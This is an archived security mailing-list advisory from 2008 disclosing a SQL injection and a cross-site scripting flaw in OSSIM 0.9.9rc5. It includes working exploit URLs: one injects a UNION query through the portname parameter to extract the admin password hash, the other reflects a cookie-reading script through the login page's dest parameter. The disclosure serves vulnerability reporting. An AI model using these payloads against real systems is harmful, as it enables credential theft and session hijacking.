Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

SQL-injection, XSS in OSSIM (Open Source Security Information Management

from [marcin . kopec] Network Security [Permanent Link]
Subject: SQL-injection, XSS in OSSIM (Open Source Security Information Management)
Date: 21 Feb 2008 12:47:12 -0000 
Application: OSSIM
http://www.ossim.net
Version: 0.9.9rc5 
Note: it is possible that the problem affects also earlier OSSIM versions
Platforms: Linux
Bug: SQL injection, Cross Site Scripting
Exploitation: remote
Date: 21 Feb 2008
Author: Marcin Kopec
E-mail: marcin(dot)kopec(at)hotmail(dot)com

---------------------------------------

1) Introduction

OSSIM it's a free implementation of  Security Information Management (SIM) 
system, equipped with many useful security tools (nessus, snort, p0f, ntop, 
...) managed from easy-to-use web panel.

2) SQL injection

The bug exist in portname parameter of modifyportform.php
It's possible to obtain hashed administrator password when user have rights to 
do port modification in "PORTS" tab.

http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login='admin

3) XSS

Quotes in OSSIM aren't property sanitized.  
Below XSS may be executed without logging into the OSSIM.

http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  PHP-Nuke Siir SQL Injection(id), hackturkiye . hackturkiye
Next by Date:  XOOPS Module tinyevent-print SQL Injection(id), hackturkiye . hackturkiye
Previous by Thread:  PHP-Nuke Siir SQL Injection(id), hackturkiye . hackturkiye
Next by Thread:  Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management), Dominique Karg
Indexes:  [Date] [Thread] [Top] [All Lists]